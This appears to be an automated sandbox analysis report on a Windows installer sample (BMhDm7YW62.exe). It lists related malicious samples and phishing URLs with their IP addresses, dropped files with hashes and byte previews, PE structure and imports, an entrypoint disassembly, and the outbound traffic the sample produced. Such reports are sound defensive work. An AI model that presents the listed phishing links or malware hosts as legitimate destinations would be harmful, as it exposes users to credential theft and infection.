                                                                                                                      https://r20.rs6.net/tn.jsp?f=0014mq83eSqn0kaNc_hoo4Y7UT70CU2szuYTIo-hWN-bnpW_37lKy8kj-ZVBURrzWkrqphuKB7_ms9nXnPsCeN19IzJrh7FdtpDLA4Kj_5L-vhd0fdO0dM7jglK-Up8iV8pyx42_d3yTzkepqtSfxwhK8VPKE9stEIggaZuWb2dYbLqBe29TKh8Ogxugd3aaVQ75Lx1LaOBkNtAONmqlxdzW5ntBeJPatCzzOiOxA0yob1MMiiM_pDmzKrEUemA3dzU&c=&ch=&__=/16:00/anVzdGluLmpvcmRhbkB3YXJyaW9yc2hlYXJ0LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                      • 192.185.156.197
                                                                                                                      Untitled attachment 00003.htmGet hashmaliciousUnknownBrowse
                                                                                                                      • 108.167.158.60
                                                                                                                      Payment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 162.240.81.18
                                                                                                                      https://www.evernote.com/shard/s360/sh/cb0c87b7-bc12-664e-4f2e-9f9869f3666f/HOx7Ff6NGWLvcPrgZqCUweAukbtLEoMc4UUNNBp3fJ3bi0hCeG88Iw4bKQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 108.179.232.88
                                                                                                                      Untitled attachment 00003.htmGet hashmaliciousUnknownBrowse
                                                                                                                      • 108.167.158.60
                                                                                                                      https://koesayangsayangedancok.com/myaccount/?key=fe1e1c2d7a267589233867d23b8e1ae911d07ebbGet hashmaliciousUnknownBrowse
                                                                                                                      • 162.240.155.1
                                                                                                                      https://gem.godaddy.com/signups/activate/MS0talpBQ0Zwb2kvQXFpdVpicjVwbEl6RTBJZmljTzVGSzZuVmlxTXRuckNKdTdiRXdZdkJWVXFqclREUkk4UmxzNy9XMXJSN0pwYlo0SnQrQUJNZjVUaVhvV2ovNDctLUR4SWQvakRySUF0YnRMUmMtLWVUQzlRd0d4WlAvVUxCWmovM0lRbFE9PQ==?signup=9180039Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 162.241.124.47
                                                                                                                      https://uhzwwzlwiyb2-1322892769.cos.ap-mumbai.myqcloud.com/uhzwwzlwiyb2.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 69.49.230.198
                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.7037.3815.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 50.87.139.143
                                                                                                                      Thank You for your interest.emlGet hashmaliciousUnknownBrowse
                                                                                                                      • 162.240.109.224
                                                                                                                      Revised_PO3923447.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 74.220.199.6
                                                                                                                      ATT00001.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 108.167.158.60
                                                                                                                      NEW_KSA-DUBAI_PROJECT_RFQ_DETAILS_#5688QM-988765RQ-ESPRIUS-DES-MWQTRRM.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 50.87.145.7
                                                                                                                      DOC_6653.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 50.6.138.90
                                                                                                                      https://muimomji.merceford.com.br/JBXRLNP4/bXBhcmFkaXNlQHdpY2tlcnNtaXRoLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                      • 108.179.193.59
                                                                                                                      SecuriteInfo.com.Trojan.Inject4.59820.14009.25482.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 162.241.169.155
                                                                                                                      krj2UH1P3A.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 192.185.216.61
                                                                                                                      krj2UH1P3A.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 192.185.216.61
                                                                                                                      OVHFRNEW_KSA-DUBAI_PROJECT_RFQ_DETAILS_#5688QM-988765RQ-ESPRIUS-DES-MWQTRMK.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 139.99.123.203
                                                                                                                      Payment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 144.217.103.3
                                                                                                                      PGHPC-10-0033-FZB-001_I.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 142.44.226.116
                                                                                                                      https://pub-c8343f3be53b487e8c1e783ebc315cf5.r2.dev/index.htmlGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                      • 5.39.120.9
                                                                                                                      Debt-Payment_paper.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • 37.187.135.80
                                                                                                                      Debt-Payment_paper.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • 37.187.135.80
                                                                                                                      rQuotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      Halkbank_Ekstre_20231201_065805_508653.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      MRKU8781602.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      Purchase_Order_#PO30086.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      Signed_PO.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      PO_0206201.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      4wnssyl130.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                                                      • 146.59.209.152
                                                                                                                      NEW_KSA-DUBAI_PROJECT_RFQ_DETAILS_#5688QM-988765RQ-ESPRIUS-DES-MWQTRRM.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 139.99.123.203
                                                                                                                      SSLTD.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 149.202.25.75
                                                                                                                      23021205_4534Documentation-PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 51.38.247.67
                                                                                                                      RFQ_#_6000064879.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 142.44.226.116
                                                                                                                      bntdUUqrfu.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 51.38.43.18
                                                                                                                      http://allomamandodo.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 213.186.33.24
                                                                                                                      LEASEWEB-USA-WDCUSPayment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      https://conexaoufo.com/en/salyut-7-space-angels-sighted-by-russian-cosmonauts/?fbclid=IwAR0M6Prz4YudFXb6qx6hSSNhDH_aQ50t8dMsDeG9zxGInfhVplAejrcwSlgGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.57
                                                                                                                      6iDFqoUZdJ.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                                                      • 23.82.12.37
                                                                                                                      https://bsetsy.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 216.22.16.40
                                                                                                                      https://smbc-card.world/index/indexinfore.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.56
                                                                                                                      http://nerokolim.camGet hashmaliciousUnknownBrowse
                                                                                                                      • 192.96.203.13
                                                                                                                      Payment_Notification.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 23.82.12.31
                                                                                                                      wechat_XC560-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.151
                                                                                                                      Bntwfkvhnfruab.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • 23.82.12.35
                                                                                                                      https://taget.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.137
                                                                                                                      file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                                                                      • 216.38.55.227
                                                                                                                      https://myaccount.dropsend.com/file/099c02133fa10997Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 192.96.202.199
                                                                                                                      Quotation_File_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 23.82.12.35
                                                                                                                      8319.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 162.210.199.87
                                                                                                                      https://lazesoft.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.142
                                                                                                                      wlanext.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      HSBC_Customer_Information.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      https://arthurrlemus.wixsite.com/micr/officeGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.8
                                                                                                                      Pb1bUndg2D.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      Quotation_package_RFQ_10750.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Temp\281B196J

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):196608
                                                                                                                      Entropy (8bit):1.1209935793793442
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                                                                      MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                                                                      SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                                                                      SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                                                                      SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\okawzsv.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\BMhDm7YW62.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):203776
                                                                                                                      Entropy (8bit):6.420338098094209
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:6FslQcYDAB88t1V4YnZ97E3ofrA7oesrNmU3XA++9XxlA+grNRl:63LUB88l4Y5WsIcXALbgBr
                                                                                                                      MD5:7673BEFD936A20FA9EB874383DEEDBFF
                                                                                                                      SHA1:EF9C4737AEB0EA4ACA651DCD42CDEC93B94F7A16
                                                                                                                      SHA-256:AE77829E72E4CAEB7F503B4D6E53708B2F3679C1B26C4F646B2C583775F7FC0F
                                                                                                                      SHA-512:5DCE83198D054D632FDBF3B1D117E7E92A337FF279FAF003FB5470A385A021C4B541D0EBEB1B7AD3AC2CAE657F8FF6EA54C265716F0A18CF54B6235E0348935E
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u...&...&...&..0&..&...&...&...&,..&!C$&..&...&...&I".&...&I"1&...&Rich...&................PE..L...b.Te.................N...................`....@..........................`.......................................................................................b..8...............................@............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....W.......4..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\wapnwfyefzd.e

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\BMhDm7YW62.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):270866
                                                                                                                      Entropy (8bit):7.999044897020019
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:6144:2MzIXQWSDcJHt1hevE9iO6Mnf7TUOi4bf8YeUYYcjTnNUyjj:2MzIrhJNOvRO6q0wehpD/
                                                                                                                      MD5:32E64CB5E9C34A50D5B9015AFAD74D35
                                                                                                                      SHA1:7387CF791028361276068BD0388DDE8B6C2632E2
                                                                                                                      SHA-256:933FF72F200A2987476A151A3CF67DF6C016F22792A62EB596E3460CC6004F42
                                                                                                                      SHA-512:76A813E37E65EF6059AD8C550BCB68BFB6FCEB2DF88AB4FCFAFF547E67DF71984DE61AEB20AC33D514C72EE4AB35C2B439258B7C3F7C2B705AAE702E62497CB6
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:A.m}..&o....`.1....%...m[........2...?.............c|....L.;...QP.!..7f...,.+l.w..9\.m.!....@_S.5.....Z....=6.K$.^;....++.o...|{}..X..i[W#++...7...!...;....Z...e..<l.-.k3).:...g./.....BkV.._Q..E.....cn..m%..".........7.....%..\7=.....[}.../Od..&o...N...=`....|X_...............?..9..........c|.....L..S..k).8..[<....8~..3k...P..B.....P`..5$.V...e%kC.K$.^;...q .0....F.c..$e..M...|..A.dq.........g..:.%.U3.k3..b...O...8V.7.BkV..^Q.K.t4.~..)n..m%...[...(...v7........\.=.R...[}.../Od..&o...N...=`...]|.......>......2...?.............c|.....L..S..k).8..[<....8~..3k...P..B.....P`..5$.V...e%kC.K$.^;...q .0....F.c..$e..M...|..A.dq.........g..:.<l.-.k3.Y:..O...@V...BkV..^Q.K.t4...cn..m%...[...(...v7........\.=.R...[}.../Od..&o...N...=`...]|.......>......2...?.............c|.....L..S..k).8..[<....8~..3k...P..B.....P`..5$.V...e%kC.K$.^;...q .0....F.c..$e..M...|..A.dq.........g..:.<l.-.k3.Y:..O...@V...BkV..^Q.K.t4...cn..m%...[...(.

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.919759837805585
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:BMhDm7YW62.exe
                                                                                                                      File size:407'137 bytes
                                                                                                                      MD5:67c64609c2542690d1d652d085a8f2bf
                                                                                                                      SHA1:8017c9b1b9273f49bdc02e4b90de1cb767202c0b
                                                                                                                      SHA256:3cc5b7aa1246d1f0bce5ffcabaa0525c40214012fc13998c711ac741ae71d4ce
                                                                                                                      SHA512:350d6934b6e0201532d05e25b67ae4bb969bc05678699c44d6883d21b5d4b47045b90a1cff9b19b8e3dde020b72223ad29bfd2ea3ef1d81aaf30743db1af6db0
                                                                                                                      SSDEEP:6144:3BlL/j1teResHZW7hUABOIHNydb8phKR7kBc3N9ZbmJHFoAZHpn2CRcscnPiZ:xhHefWO5Itk8w35oHFocJn2CRzcnPm
                                                                                                                      TLSH:9684121DB2D629A3CCE60B7206727D11D5BE8C240435B5939291CFAFDA72D9F9B031A3
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                                                                                      File Icon

                                                                                                                      Icon Hash:3dd5909890858585

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x4030fb
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      sub esp, 00000184h
                                                                                                                      push ebx
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [esp+20h], ebx
                                                                                                                      mov dword ptr [esp+14h], 00409168h
                                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                                      mov byte ptr [esp+18h], 00000020h
                                                                                                                      call dword ptr [004070B0h]
                                                                                                                      call dword ptr [004070ACh]
                                                                                                                      cmp ax, 00000006h
                                                                                                                      je 00007F3280D78773h
                                                                                                                      push ebx
                                                                                                                      call 00007F3280D7B554h
                                                                                                                      cmp eax, ebx
                                                                                                                      je 00007F3280D78769h
                                                                                                                      push 00000C00h
                                                                                                                      call eax
                                                                                                                      mov esi, 00407280h
                                                                                                                      push esi
                                                                                                                      call 00007F3280D7B4D0h
                                                                                                                      push esi
                                                                                                                      call dword ptr [00407108h]
                                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                                      cmp byte ptr [esi], bl
                                                                                                                      jne 00007F3280D7874Dh
                                                                                                                      push 0000000Dh
                                                                                                                      call 00007F3280D7B528h
                                                                                                                      push 0000000Bh
                                                                                                                      call 00007F3280D7B521h
                                                                                                                      mov dword ptr [00423F44h], eax
                                                                                                                      call dword ptr [00407038h]
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040726Ch]
                                                                                                                      mov dword ptr [00423FF8h], eax
                                                                                                                      push ebx
                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                      push 00000160h
                                                                                                                      push eax
                                                                                                                      push ebx
                                                                                                                      push 0041F4F0h
                                                                                                                      call dword ptr [0040715Ch]
                                                                                                                      push 0040915Ch
                                                                                                                      push 00423740h
                                                                                                                      call 00007F3280D7B154h
                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                      mov ebp, 0042A000h
                                                                                                                      push eax
                                                                                                                      push ebp
                                                                                                                      call 00007F3280D7B142h
                                                                                                                      push ebx
                                                                                                                      call dword ptr [00407144h]

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x46e0.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x5aeb0x5c00False0.6651239809782609data6.42230569414204IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x70000x11960x1200False0.458984375data5.202917366589074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x90000x1b0380x600False0.4322916666666667data4.047511829596067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x2d0000x46e00x4800False0.3369683159722222data5.14881700232849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0x2d3b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.18151969981238275
                                                                                                                      RT_ICON0x2e4600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.45614754098360655
                                                                                                                      RT_ICON0x2ede80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.33077617328519854
                                                                                                                      RT_ICON0x2f6900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.48963133640552997
                                                                                                                      RT_ICON0x2fd580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3468208092485549
                                                                                                                      RT_ICON0x302c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.49024822695035464
                                                                                                                      RT_ICON0x307280x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5497311827956989
                                                                                                                      RT_ICON0x30a100x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.5614754098360656
                                                                                                                      RT_ICON0x30bf80x130Device independent bitmap graphic, 32 x 64 x 1, image size 128EnglishUnited States0.5032894736842105
                                                                                                                      RT_ICON0x30d280x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5844594594594594
                                                                                                                      RT_ICON0x30e500xb0Device independent bitmap graphic, 16 x 32 x 1, image size 64EnglishUnited States0.4943181818181818
                                                                                                                      RT_DIALOG0x30f000x100dataEnglishUnited States0.5234375
                                                                                                                      RT_DIALOG0x310000x11cdataEnglishUnited States0.6056338028169014
                                                                                                                      RT_DIALOG0x311200x60dataEnglishUnited States0.7291666666666666
                                                                                                                      RT_GROUP_ICON0x311800xa0dataEnglishUnited States0.60625
                                                                                                                      RT_VERSION0x312200x1ecdataEnglishUnited States0.4613821138211382
                                                                                                                      RT_MANIFEST0x314100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States0.5656424581005587

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                                      USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 7, 2023 15:52:47.314702034 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.490710020 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.490933895 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.492466927 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.668174982 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.668746948 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.668822050 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.668890953 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.668951035 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.669006109 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.669051886 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.669086933 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.669236898 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.669281006 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.669322968 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.669347048 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.669357061 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:52:47.669382095 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.669414997 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.670814037 CET4971080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:52:47.846657991 CET804971084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:03.854023933 CET4971180192.168.2.11103.210.56.141
                                                                                                                      Dec 7, 2023 15:53:04.260530949 CET8049711103.210.56.141192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:04.260668993 CET4971180192.168.2.11103.210.56.141
                                                                                                                      Dec 7, 2023 15:53:04.260973930 CET4971180192.168.2.11103.210.56.141
                                                                                                                      Dec 7, 2023 15:53:04.669328928 CET8049711103.210.56.141192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:05.381544113 CET8049711103.210.56.141192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:05.381573915 CET8049711103.210.56.141192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:05.381705999 CET4971180192.168.2.11103.210.56.141
